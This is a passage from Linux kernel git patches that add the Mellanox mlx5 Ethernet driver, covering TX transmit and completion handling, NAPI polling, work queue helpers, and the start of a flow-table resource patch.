skb_vlan_tag_present(skb) ? + skb->vlan_tci >> VLAN_PRIO_SHIFT : + priv->default_vlan_prio; + int tc = netdev_get_prio_tc_map(dev, up); + + return (tc << priv->order_base_2_num_channels) | channel_ix; +} + +static inline u16 mlx5e_get_inline_hdr_size(struct mlx5e_sq *sq, + struct sk_buff *skb) +{ +#define MLX5E_MIN_INLINE 16 /* eth header with vlan (w/o next ethertype) */ + return MLX5E_MIN_INLINE; +} + +static inline void mlx5e_insert_vlan(void *start, struct sk_buff *skb, u16 ihs) +{ + struct vlan_ethhdr *vhdr = (struct vlan_ethhdr *)start; + int cpy1_sz = 2 * ETH_ALEN; + int cpy2_sz = ihs - cpy1_sz - VLAN_HLEN; + + skb_copy_from_linear_data(skb, vhdr, cpy1_sz); + skb_pull_inline(skb, cpy1_sz); + vhdr->h_vlan_proto = skb->vlan_proto; + vhdr->h_vlan_TCI = cpu_to_be16(skb_vlan_tag_get(skb)); + skb_copy_from_linear_data(skb, &vhdr->h_vlan_encapsulated_proto, + cpy2_sz); + skb_pull_inline(skb, cpy2_sz); +} + +static netdev_tx_t mlx5e_sq_xmit(struct mlx5e_sq *sq, struct sk_buff *skb) +{ + struct mlx5_wq_cyc *wq = &sq->wq; + + u16 pi = sq->pc & wq->sz_m1; + struct mlx5e_tx_wqe *wqe = mlx5_wq_cyc_get_wqe(wq, pi); + + struct mlx5_wqe_ctrl_seg *cseg = &wqe->ctrl; + struct mlx5_wqe_eth_seg *eseg = &wqe->eth; + struct mlx5_wqe_data_seg *dseg; + + u8 opcode = MLX5_OPCODE_SEND; + dma_addr_t dma_addr = 0; + u16 headlen; + u16 ds_cnt; + u16 ihs; + int i; + + memset(wqe, 0, sizeof(*wqe)); + + if (likely(skb->ip_summed == CHECKSUM_PARTIAL)) + eseg->cs_flags = MLX5_ETH_WQE_L3_CSUM | MLX5_ETH_WQE_L4_CSUM; + else + sq->stats.csum_offload_none++; + + if (skb_is_gso(skb)) { + u32 payload_len; + int num_pkts; + + eseg->mss = cpu_to_be16(skb_shinfo(skb)->gso_size); + opcode = MLX5_OPCODE_LSO; + ihs = skb_transport_offset(skb) + tcp_hdrlen(skb); + payload_len = skb->len - ihs; + num_pkts = (payload_len / skb_shinfo(skb)->gso_size) + + !!(payload_len % skb_shinfo(skb)->gso_size); + MLX5E_TX_SKB_CB(skb)->num_bytes = skb->len + + (num_pkts - 1) * ihs; + sq->stats.tso_packets++; + sq->stats.tso_bytes += payload_len; + } else { + ihs = mlx5e_get_inline_hdr_size(sq, skb); + MLX5E_TX_SKB_CB(skb)->num_bytes = max_t(unsigned int, skb->len, + ETH_ZLEN); + } + + if (skb_vlan_tag_present(skb)) { + mlx5e_insert_vlan(eseg->inline_hdr_start, skb, ihs); + } else { + skb_copy_from_linear_data(skb, eseg->inline_hdr_start, ihs); + skb_pull_inline(skb, ihs); + } + + eseg->inline_hdr_sz = cpu_to_be16(ihs); + + ds_cnt = sizeof(*wqe) / MLX5_SEND_WQE_DS; + ds_cnt += DIV_ROUND_UP(ihs - sizeof(eseg->inline_hdr_start), + MLX5_SEND_WQE_DS); + dseg = (struct mlx5_wqe_data_seg *)cseg + ds_cnt; + + MLX5E_TX_SKB_CB(skb)->num_dma = 0; + + headlen = skb_headlen(skb); + if (headlen) { + dma_addr = dma_map_single(sq->pdev, skb->data, headlen, + DMA_TO_DEVICE); + if (unlikely(dma_mapping_error(sq->pdev, dma_addr))) + goto dma_unmap_wqe_err; + + dseg->addr = cpu_to_be64(dma_addr); + dseg->lkey = sq->mkey_be; + dseg->byte_count = cpu_to_be32(headlen); + + mlx5e_dma_push(sq, dma_addr, headlen); + MLX5E_TX_SKB_CB(skb)->num_dma++; + + dseg++; + } + + for (i = 0; i < skb_shinfo(skb)->nr_frags; i++) { + struct skb_frag_struct *frag = &skb_shinfo(skb)->frags[i]; + int fsz = skb_frag_size(frag); + + dma_addr = skb_frag_dma_map(sq->pdev, frag, 0, fsz, + DMA_TO_DEVICE); + if (unlikely(dma_mapping_error(sq->pdev, dma_addr))) + goto dma_unmap_wqe_err; + + dseg->addr = cpu_to_be64(dma_addr); + dseg->lkey = sq->mkey_be; + dseg->byte_count = cpu_to_be32(fsz); + + mlx5e_dma_push(sq, dma_addr, fsz); + MLX5E_TX_SKB_CB(skb)->num_dma++; + + dseg++; + } + + ds_cnt += MLX5E_TX_SKB_CB(skb)->num_dma; + + cseg->opmod_idx_opcode = cpu_to_be32((sq->pc << 8) | opcode); + cseg->qpn_ds = cpu_to_be32((sq->sqn << 8) | ds_cnt); + cseg->fm_ce_se = MLX5_WQE_CTRL_CQ_UPDATE; + + sq->skb[pi] = skb; + + MLX5E_TX_SKB_CB(skb)->num_wqebbs = DIV_ROUND_UP(ds_cnt, + MLX5_SEND_WQEBB_NUM_DS); + sq->pc += MLX5E_TX_SKB_CB(skb)->num_wqebbs; + + netdev_tx_sent_queue(sq->txq, MLX5E_TX_SKB_CB(skb)->num_bytes); + + if (unlikely(!mlx5e_sq_has_room_for(sq, MLX5_SEND_WQE_MAX_WQEBBS))) { + netif_tx_stop_queue(sq->txq); + sq->stats.stopped++; + } + + if (!skb->xmit_more || netif_xmit_stopped(sq->txq)) + mlx5e_tx_notify_hw(sq, wqe); + + sq->stats.packets++; + return NETDEV_TX_OK; + +dma_unmap_wqe_err: + sq->stats.dropped++; + mlx5e_dma_unmap_wqe_err(sq, skb); + + dev_kfree_skb_any(skb); + + return NETDEV_TX_OK; +} + +netdev_tx_t mlx5e_xmit(struct sk_buff *skb, struct net_device *dev) +{ + struct mlx5e_priv *priv = netdev_priv(dev); + int ix = skb->queue_mapping; + int tc = 0; + struct mlx5e_channel *c = priv->channel[ix]; + struct mlx5e_sq *sq = &c->sq[tc]; + + return mlx5e_sq_xmit(sq, skb); +} + +netdev_tx_t mlx5e_xmit_multi_tc(struct sk_buff *skb, struct net_device *dev) +{ + struct mlx5e_priv *priv = netdev_priv(dev); + int ix = skb->queue_mapping & priv->queue_mapping_channel_mask; + int tc = skb->queue_mapping >> priv->order_base_2_num_channels; + struct mlx5e_channel *c = priv->channel[ix]; + struct mlx5e_sq *sq = &c->sq[tc]; + + return mlx5e_sq_xmit(sq, skb); +} + +bool mlx5e_poll_tx_cq(struct mlx5e_cq *cq) +{ + struct mlx5e_sq *sq; + u32 dma_fifo_cc; + u32 nbytes; + u16 npkts; + u16 sqcc; + int i; + + /* avoid accessing cq (dma coherent memory) if not needed */ + if (!test_and_clear_bit(MLX5E_CQ_HAS_CQES, &cq->flags)) + return false; + + sq = cq->sqrq; + + npkts = 0; + nbytes = 0; + + /* sq->cc must be updated only after mlx5_cqwq_update_db_record(), + * otherwise a cq overrun may occur + */ + sqcc = sq->cc; + + /* avoid dirtying sq cache line every cqe */ + dma_fifo_cc = sq->dma_fifo_cc; + + for (i = 0; i < MLX5E_TX_CQ_POLL_BUDGET; i++) { + struct mlx5_cqe64 *cqe; + struct sk_buff *skb; + u16 ci; + int j; + + cqe = mlx5e_get_cqe(cq); + if (!cqe) + break; + + ci = sqcc & sq->wq.sz_m1; + skb = sq->skb[ci]; + + if (unlikely(!skb)) { /* nop */ + sq->stats.nop++; + sqcc++; + goto free_skb; + } + + for (j = 0; j < MLX5E_TX_SKB_CB(skb)->num_dma; j++) { + dma_addr_t addr; + u32 size; + + mlx5e_dma_get(sq, dma_fifo_cc, &addr, &size); + dma_fifo_cc++; + dma_unmap_single(sq->pdev, addr, size, DMA_TO_DEVICE); + } + + npkts++; + nbytes += MLX5E_TX_SKB_CB(skb)->num_bytes; + sqcc += MLX5E_TX_SKB_CB(skb)->num_wqebbs; + +free_skb: + dev_kfree_skb(skb); + } + + mlx5_cqwq_update_db_record(&cq->wq); + + /* ensure cq space is freed before enabling more cqes */ + wmb(); + + sq->dma_fifo_cc = dma_fifo_cc; + sq->cc = sqcc; + + netdev_tx_completed_queue(sq->txq, npkts, nbytes); + + if (netif_tx_queue_stopped(sq->txq) && + mlx5e_sq_has_room_for(sq, MLX5_SEND_WQE_MAX_WQEBBS) && + likely(test_bit(MLX5E_SQ_STATE_WAKE_TXQ_ENABLE, &sq->state))) { + netif_tx_wake_queue(sq->txq); + sq->stats.wake++; + } + if (i == MLX5E_TX_CQ_POLL_BUDGET) { + set_bit(MLX5E_CQ_HAS_CQES, &cq->flags); + return true; + } + + return false; +} diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_txrx.c b/drivers/net/ethernet/mellanox/mlx5/core/en_txrx.c new file mode 100644 index 000000000000..088bc424157c --- /dev/null +++ b/drivers/net/ethernet/mellanox/mlx5/core/en_txrx.c @@ -0,0 +1,107 @@ +/* + * Copyright (c) 2015, Mellanox Technologies. All rights reserved. + * + * This software is available to you under a choice of one of two + * licenses. You may choose to be licensed under the terms of the GNU + * General Public License (GPL) Version 2, available from the file + * COPYING in the main directory of this source tree, or the + * OpenIB.org BSD license below: + * + * Redistribution and use in source and binary forms, with or + * without modification, are permitted provided that the following + * conditions are met: + * + * - Redistributions of source code must retain the above + * copyright notice, this list of conditions and the following + * disclaimer. + * + * - Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following + * disclaimer in the documentation and/or other materials + * provided with the distribution. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +#include "en.h" + +struct mlx5_cqe64 *mlx5e_get_cqe(struct mlx5e_cq *cq) +{ + struct mlx5_cqwq *wq = &cq->wq; + u32 ci = mlx5_cqwq_get_ci(wq); + struct mlx5_cqe64 *cqe = mlx5_cqwq_get_wqe(wq, ci); + int cqe_ownership_bit = cqe->op_own & MLX5_CQE_OWNER_MASK; + int sw_ownership_val = mlx5_cqwq_get_wrap_cnt(wq) & 1; + + if (cqe_ownership_bit != sw_ownership_val) + return NULL; + + mlx5_cqwq_pop(wq); + + /* ensure cqe content is read after cqe ownership bit */ + rmb(); + + return cqe; +} + +int mlx5e_napi_poll(struct napi_struct *napi, int budget) +{ + struct mlx5e_channel *c = container_of(napi, struct mlx5e_channel, + napi); + bool busy = false; + int i; + + clear_bit(MLX5E_CHANNEL_NAPI_SCHED, &c->flags); + + for (i = 0; i < c->num_tc; i++) + busy |= mlx5e_poll_tx_cq(&c->sq[i].cq); + + busy |= mlx5e_poll_rx_cq(&c->rq.cq, budget); + + busy |= mlx5e_post_rx_wqes(c->rq.cq.sqrq); + + if (busy) + return budget; + + napi_complete(napi); + + /* avoid losing completion event during/after polling cqs */ + if (test_bit(MLX5E_CHANNEL_NAPI_SCHED, &c->flags)) { + napi_schedule(napi); + return 0; + } + + for (i = 0; i < c->num_tc; i++) + mlx5e_cq_arm(&c->sq[i].cq); + mlx5e_cq_arm(&c->rq.cq); + + return 0; +} + +void mlx5e_completion_event(struct mlx5_core_cq *mcq) +{ + struct mlx5e_cq *cq = container_of(mcq, struct mlx5e_cq, mcq); + + set_bit(MLX5E_CQ_HAS_CQES, &cq->flags); + set_bit(MLX5E_CHANNEL_NAPI_SCHED, &cq->channel->flags); + barrier(); + napi_schedule(cq->napi); +} + +void mlx5e_cq_error_event(struct mlx5_core_cq *mcq, enum mlx5_event event) +{ + struct mlx5e_cq *cq = container_of(mcq, struct mlx5e_cq, mcq); + struct mlx5e_channel *c = cq->channel; + struct mlx5e_priv *priv = c->priv; + struct net_device *netdev = priv->netdev; + + netdev_err(netdev, "%s: cqn=0x%.6x event=0x%.2x\n", + __func__, mcq->cqn, event); +} diff --git a/drivers/net/ethernet/mellanox/mlx5/core/wq.c b/drivers/net/ethernet/mellanox/mlx5/core/wq.c new file mode 100644 index 000000000000..8388411582cf --- /dev/null +++ b/drivers/net/ethernet/mellanox/mlx5/core/wq.c @@ -0,0 +1,183 @@ +/* + * Copyright (c) 2013-2015, Mellanox Technologies, Ltd. All rights reserved. + * + * This software is available to you under a choice of one of two + * licenses. You may choose to be licensed under the terms of the GNU + * General Public License (GPL) Version 2, available from the file + * COPYING in the main directory of this source tree, or the + * OpenIB.org BSD license below: + * + * Redistribution and use in source and binary forms, with or + * without modification, are permitted provided that the following + * conditions are met: + * + * - Redistributions of source code must retain the above + * copyright notice, this list of conditions and the following + * disclaimer. + * + * - Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following + * disclaimer in the documentation and/or other materials + * provided with the distribution. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +#include +#include "wq.h" +#include "mlx5_core.h" + +u32 mlx5_wq_cyc_get_size(struct mlx5_wq_cyc *wq) +{ + return (u32)wq->sz_m1 + 1; +} + +u32 mlx5_cqwq_get_size(struct mlx5_cqwq *wq) +{ + return wq->sz_m1 + 1; +} + +u32 mlx5_wq_ll_get_size(struct mlx5_wq_ll *wq) +{ + return (u32)wq->sz_m1 + 1; +} + +static u32 mlx5_wq_cyc_get_byte_size(struct mlx5_wq_cyc *wq) +{ + return mlx5_wq_cyc_get_size(wq) << wq->log_stride; +} + +static u32 mlx5_cqwq_get_byte_size(struct mlx5_cqwq *wq) +{ + return mlx5_cqwq_get_size(wq) << wq->log_stride; +} + +static u32 mlx5_wq_ll_get_byte_size(struct mlx5_wq_ll *wq) +{ + return mlx5_wq_ll_get_size(wq) << wq->log_stride; +} + +int mlx5_wq_cyc_create(struct mlx5_core_dev *mdev, struct mlx5_wq_param *param, + void *wqc, struct mlx5_wq_cyc *wq, + struct mlx5_wq_ctrl *wq_ctrl) +{ + int err; + + wq->log_stride = MLX5_GET(wq, wqc, log_wq_stride); + wq->sz_m1 = (1 << MLX5_GET(wq, wqc, log_wq_sz)) - 1; + + err = mlx5_db_alloc(mdev, &wq_ctrl->db); + if (err) { + mlx5_core_warn(mdev, "mlx5_db_alloc() failed, %d\n", err); + return err; + } + + err = mlx5_buf_alloc(mdev, mlx5_wq_cyc_get_byte_size(wq), &wq_ctrl->buf); + if (err) { + mlx5_core_warn(mdev, "mlx5_buf_alloc() failed, %d\n", err); + goto err_db_free; + } + + wq->buf = wq_ctrl->buf.direct.buf; + wq->db = wq_ctrl->db.db; + + wq_ctrl->mdev = mdev; + + return 0; + +err_db_free: + mlx5_db_free(mdev, &wq_ctrl->db); + + return err; +} + +int mlx5_cqwq_create(struct mlx5_core_dev *mdev, struct mlx5_wq_param *param, + void *cqc, struct mlx5_cqwq *wq, + struct mlx5_wq_ctrl *wq_ctrl) +{ + int err; + + wq->log_stride = 6 + MLX5_GET(cqc, cqc, cqe_sz); + wq->log_sz = MLX5_GET(cqc, cqc, log_cq_size); + wq->sz_m1 = (1 << wq->log_sz) - 1; + + err = mlx5_db_alloc(mdev, &wq_ctrl->db); + if (err) { + mlx5_core_warn(mdev, "mlx5_db_alloc() failed, %d\n", err); + return err; + } + + err = mlx5_buf_alloc(mdev, mlx5_cqwq_get_byte_size(wq), &wq_ctrl->buf); + if (err) { + mlx5_core_warn(mdev, "mlx5_buf_alloc() failed, %d\n", err); + goto err_db_free; + } + + wq->buf = wq_ctrl->buf.direct.buf; + wq->db = wq_ctrl->db.db; + + wq_ctrl->mdev = mdev; + + return 0; + +err_db_free: + mlx5_db_free(mdev, &wq_ctrl->db); + + return err; +} + +int mlx5_wq_ll_create(struct mlx5_core_dev *mdev, struct mlx5_wq_param *param, + void *wqc, struct mlx5_wq_ll *wq, + struct mlx5_wq_ctrl *wq_ctrl) +{ + struct mlx5_wqe_srq_next_seg *next_seg; + int err; + int i; + + wq->log_stride = MLX5_GET(wq, wqc, log_wq_stride); + wq->sz_m1 = (1 << MLX5_GET(wq, wqc, log_wq_sz)) - 1; + + err = mlx5_db_alloc(mdev, &wq_ctrl->db); + if (err) { + mlx5_core_warn(mdev, "mlx5_db_alloc() failed, %d\n", err); + return err; + } + + err = mlx5_buf_alloc(mdev, mlx5_wq_ll_get_byte_size(wq), &wq_ctrl->buf); + if (err) { + mlx5_core_warn(mdev, "mlx5_buf_alloc() failed, %d\n", err); + goto err_db_free; + } + + wq->buf = wq_ctrl->buf.direct.buf; + wq->db = wq_ctrl->db.db; + + for (i = 0; i < wq->sz_m1; i++) { + next_seg = mlx5_wq_ll_get_wqe(wq, i); + next_seg->next_wqe_index = cpu_to_be16(i + 1); + } + next_seg = mlx5_wq_ll_get_wqe(wq, i); + wq->tail_next = &next_seg->next_wqe_index; + + wq_ctrl->mdev = mdev; + + return 0; + +err_db_free: + mlx5_db_free(mdev, &wq_ctrl->db); + + return err; +} + +void mlx5_wq_destroy(struct mlx5_wq_ctrl *wq_ctrl) +{ + mlx5_buf_free(wq_ctrl->mdev, &wq_ctrl->buf); + mlx5_db_free(wq_ctrl->mdev, &wq_ctrl->db); +} diff --git a/drivers/net/ethernet/mellanox/mlx5/core/wq.h b/drivers/net/ethernet/mellanox/mlx5/core/wq.h new file mode 100644 index 000000000000..e0ddd69fb429 --- /dev/null +++ b/drivers/net/ethernet/mellanox/mlx5/core/wq.h @@ -0,0 +1,171 @@ +/* + * Copyright (c) 2013-2015, Mellanox Technologies, Ltd. All rights reserved. + * + * This software is available to you under a choice of one of two + * licenses. You may choose to be licensed under the terms of the GNU + * General Public License (GPL) Version 2, available from the file + * COPYING in the main directory of this source tree, or the + * OpenIB.org BSD license below: + * + * Redistribution and use in source and binary forms, with or + * without modification, are permitted provided that the following + * conditions are met: + * + * - Redistributions of source code must retain the above + * copyright notice, this list of conditions and the following + * disclaimer. + * + * - Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following + * disclaimer in the documentation and/or other materials + * provided with the distribution. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +#ifndef __MLX5_WQ_H__ +#define __MLX5_WQ_H__ + +#include + +struct mlx5_wq_param { + int linear; + int numa; +}; + +struct mlx5_wq_ctrl { + struct mlx5_core_dev *mdev; + struct mlx5_buf buf; + struct mlx5_db db; +}; + +struct mlx5_wq_cyc { + void *buf; + __be32 *db; + u16 sz_m1; + u8 log_stride; +}; + +struct mlx5_cqwq { + void *buf; + __be32 *db; + u32 sz_m1; + u32 cc; /* consumer counter */ + u8 log_sz; + u8 log_stride; +}; + +struct mlx5_wq_ll { + void *buf; + __be32 *db; + __be16 *tail_next; + u16 sz_m1; + u16 head; + u16 wqe_ctr; + u16 cur_sz; + u8 log_stride; +}; + +int mlx5_wq_cyc_create(struct mlx5_core_dev *mdev, struct mlx5_wq_param *param, + void *wqc, struct mlx5_wq_cyc *wq, + struct mlx5_wq_ctrl *wq_ctrl); +u32 mlx5_wq_cyc_get_size(struct mlx5_wq_cyc *wq); + +int mlx5_cqwq_create(struct mlx5_core_dev *mdev, struct mlx5_wq_param *param, + void *cqc, struct mlx5_cqwq *wq, + struct mlx5_wq_ctrl *wq_ctrl); +u32 mlx5_cqwq_get_size(struct mlx5_cqwq *wq); + +int mlx5_wq_ll_create(struct mlx5_core_dev *mdev, struct mlx5_wq_param *param, + void *wqc, struct mlx5_wq_ll *wq, + struct mlx5_wq_ctrl *wq_ctrl); +u32 mlx5_wq_ll_get_size(struct mlx5_wq_ll *wq); + +void mlx5_wq_destroy(struct mlx5_wq_ctrl *wq_ctrl); + +static inline u16 mlx5_wq_cyc_ctr2ix(struct mlx5_wq_cyc *wq, u16 ctr) +{ + return ctr & wq->sz_m1; +} + +static inline void *mlx5_wq_cyc_get_wqe(struct mlx5_wq_cyc *wq, u16 ix) +{ + return wq->buf + (ix << wq->log_stride); +} + +static inline int mlx5_wq_cyc_cc_bigger(u16 cc1, u16 cc2) +{ + int equal = (cc1 == cc2); + int smaller = 0x8000 & (cc1 - cc2); + + return !equal && !smaller; +} + +static inline u32 mlx5_cqwq_get_ci(struct mlx5_cqwq *wq) +{ + return wq->cc & wq->sz_m1; +} + +static inline void *mlx5_cqwq_get_wqe(struct mlx5_cqwq *wq, u32 ix) +{ + return wq->buf + (ix << wq->log_stride); +} + +static inline u32 mlx5_cqwq_get_wrap_cnt(struct mlx5_cqwq *wq) +{ + return wq->cc >> wq->log_sz; +} + +static inline void mlx5_cqwq_pop(struct mlx5_cqwq *wq) +{ + wq->cc++; +} + +static inline void mlx5_cqwq_update_db_record(struct mlx5_cqwq *wq) +{ + *wq->db = cpu_to_be32(wq->cc & 0xffffff); +} + +static inline int mlx5_wq_ll_is_full(struct mlx5_wq_ll *wq) +{ + return wq->cur_sz == wq->sz_m1; +} + +static inline int mlx5_wq_ll_is_empty(struct mlx5_wq_ll *wq) +{ + return !wq->cur_sz; +} + +static inline void *mlx5_wq_ll_get_wqe(struct mlx5_wq_ll *wq, u16 ix) +{ + return wq->buf + (ix << wq->log_stride); +} + +static inline void mlx5_wq_ll_push(struct mlx5_wq_ll *wq, u16 head_next) +{ + wq->head = head_next; + wq->wqe_ctr++; + wq->cur_sz++; +} + +static inline void mlx5_wq_ll_pop(struct mlx5_wq_ll *wq, __be16 ix, + __be16 *next_tail_next) +{ + *wq->tail_next = ix; + wq->tail_next = next_tail_next; + wq->cur_sz--; +} + +static inline void mlx5_wq_ll_update_db_record(struct mlx5_wq_ll *wq) +{ + *wq->db = cpu_to_be32(wq->wqe_ctr); +} + +#endif /* __MLX5_WQ_H__ */ From afb736e9330ad6b2b6935d2f53ded784eb73f12d Mon Sep 17 00:00:00 2001 From: Amir Vadai Date: Thu, 28 May 2015 22:28:47 +0300 Subject: [PATCH 501/872] net/mlx5: Ethernet resource handling files This patch contains the resource handling files: - flow_table.c: This file contains the code to handle the low level API to configure hardware flow table. It is separated from the flow_table_en.c, because it will be used in the future by Raw Ethernet QP in mlx5_ib too. - en_flow_table.[ch]: Ethernet flow steering handling. The flow table object contain a mapping between flow specs and TIRs. This mechanism will be used also to configure e-switch in the future, when SR-IOV support will be added. - transobj.[ch] - Low level functions to create/modify/destroy the transport objects: RQ/SQ/TIR/TIS - vport.[ch] - Handle attributes of a virtual port (vPort) in the embedded switch. Currently this switch is a passthrough, until SR-IOV support will be added. Signed-off-by: Amir Vadai Signed-off-by: David S. Miller --- .../mellanox/mlx5/core/en_flow_table.c | 858 ++++++++++++++++++ .../ethernet/mellanox/mlx5/core/flow_table.c | 422 +++++++++ .../ethernet/mellanox/mlx5/core/transobj.c | 169 ++++ .../ethernet/mellanox/mlx5/core/transobj.h | 47 + .../net/ethernet/mellanox/mlx5/core/vport.c | 84 ++ .../net/ethernet/mellanox/mlx5/core/vport.h | 41 + include/linux/mlx5/flow_table.h | 54 ++ 7 files changed, 1675 insertions(+) create mode 100644 drivers/net/ethernet/mellanox/mlx5/core/en_flow_table.c create mode 100644 drivers/net/ethernet/mellanox/mlx5/core/flow_table.c create mode 100644 drivers/net/ethernet/mellanox/mlx5/core/transobj.c create mode 100644 drivers/net/ethernet/mellanox/mlx5/core/transobj.h create mode 100644 drivers/net/ethernet/mellanox/mlx5/core/vport.c create mode 100644 drivers/net/ethernet/mellanox/mlx5/core/vport.h create mode 100644 include/linux/mlx5/flow_table.h diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_flow_table.c b/drivers/net/ethernet/mellanox/mlx5/core/en_flow_table.c new file mode 100644 index 000000000000..6feebda4b3e4 --- /dev/null +++ b/drivers/net/ethernet/mellanox/mlx5/core/en_flow_table.c @@ -0,0 +1,858 @@ +/* + * Copyright (c) 2015, Mellanox Technologies. All rights reserved. + * + * This software is available to you under a choice of one of two + * licenses. You may choose to be licensed under the terms of the GNU + * General Public License (GPL) Version 2, available from the file + * COPYING in the main directory of this source tree, or the + * OpenIB.org BSD license below: + * + * Redistribution and use in source and binary forms, with or + * without modification, are permitted provided that the following + * conditions are met: + * + * - Redistributions of source code must retain the above + * copyright notice, this list of conditions and the following + * disclaimer. + * + * - Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following + * disclaimer in the documentation and/or other materials + * provided with the distribution. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +#include +#include +#include +#include +#include +#include "en.h" + +enum { + MLX5E_FULLMATCH = 0, + MLX5E_ALLMULTI = 1, + MLX5E_PROMISC = 2, +}; + +enum { + MLX5E_UC = 0, + MLX5E_MC_IPV4 = 1, + MLX5E_MC_IPV6 = 2, + MLX5E_MC_OTHER = 3, +}; + +enum { + MLX5E_ACTION_NONE = 0, + MLX5E_ACTION_ADD = 1, + MLX5E_ACTION_DEL = 2, +}; + +struct mlx5e_eth_addr_hash_node { + struct hlist_node hlist; + u8 action; + struct mlx5e_eth_addr_info ai; +}; + +static inline int mlx5e_hash_eth_addr(u8 *addr) +{ + return addr[5]; +} + +static void mlx5e_add_eth_addr_to_hash(struct hlist_head *hash, u8 *addr) +{ + struct mlx5e_eth_addr_hash_node *hn; + int ix = mlx5e_hash_eth_addr(addr); + int found = 0; + + hlist_for_each_entry(hn, &hash[ix], hlist) + if (ether_addr_equal_64bits(hn->ai.addr, addr)) { + found = 1; + break; + } + + if (found) { + hn->action = MLX5E_ACTION_NONE; + return; + } + + hn = kzalloc(sizeof(*hn), GFP_ATOMIC); + if (!hn) + return; + + ether_addr_copy(hn->ai.addr, addr); + hn->action = MLX5E_ACTION_ADD; + + hlist_add_head(&hn->hlist, &hash[ix]); +} + +static void mlx5e_del_eth_addr_from_hash(struct mlx5e_eth_addr_hash_node *hn) +{ + hlist_del(&hn->hlist); + kfree(hn); +} + +static void mlx5e_del_eth_addr_from_flow_table(struct mlx5e_priv *priv, + struct mlx5e_eth_addr_info *ai) +{ + void *ft = priv->ft.main; + + if (ai->tt_vec & (1 << MLX5E_TT_IPV6_TCP)) + mlx5_del_flow_table_entry(ft, ai->ft_ix[MLX5E_TT_IPV6_TCP]); + + if (ai->tt_vec & (1 << MLX5E_TT_IPV4_TCP)) + mlx5_del_flow_table_entry(ft, ai->ft_ix[MLX5E_TT_IPV4_TCP]); + + if (ai->tt_vec & (1 << MLX5E_TT_IPV6_UDP)) + mlx5_del_flow_table_entry(ft, ai->ft_ix[MLX5E_TT_IPV6_UDP]); + + if (ai->tt_vec & (1 << MLX5E_TT_IPV4_UDP)) + mlx5_del_flow_table_entry(ft, ai->ft_ix[MLX5E_TT_IPV4_UDP]); + + if (ai->tt_vec & (1 << MLX5E_TT_IPV6)) + mlx5_del_flow_table_entry(ft, ai->ft_ix[MLX5E_TT_IPV6]); + + if (ai->tt_vec & (1 << MLX5E_TT_IPV4)) + mlx5_del_flow_table_entry(ft, ai->ft_ix[MLX5E_TT_IPV4]); + + if (ai->tt_vec & (1 << MLX5E_TT_ANY)) + mlx5_del_flow_table_entry(ft, ai->ft_ix[MLX5E_TT_ANY]); +} + +static int mlx5e_get_eth_addr_type(u8 *addr) +{ + if (is_unicast_ether_addr(addr)) + return MLX5E_UC; + + if ((addr[0] == 0x01) && + (addr[1] == 0x00) && + (addr[2] == 0x5e) && + !(addr[3] & 0x80)) + return MLX5E_MC_IPV4; + + if ((addr[0] == 0x33) && + (addr[1] == 0x33)) + return MLX5E_MC_IPV6; + + return MLX5E_MC_OTHER; +} + +static u32 mlx5e_get_tt_vec(struct mlx5e_eth_addr_info *ai, int type) +{ + int eth_addr_type; + u32 ret; + + switch (type) { + case MLX5E_FULLMATCH: + eth_addr_type = mlx5e_get_eth_addr_type(ai->addr); + switch (eth_addr_type) { + case MLX5E_UC: + ret = + (1 << MLX5E_TT_IPV4_TCP) | + (1 << MLX5E_TT_IPV6_TCP) | + (1 << MLX5E_TT_IPV4_UDP) | + (1 << MLX5E_TT_IPV6_UDP) | + (1 << MLX5E_TT_IPV4) | + (1 << MLX5E_TT_IPV6) | + (1 << MLX5E_TT_ANY) | + 0; + break; + + case MLX5E_MC_IPV4: + ret 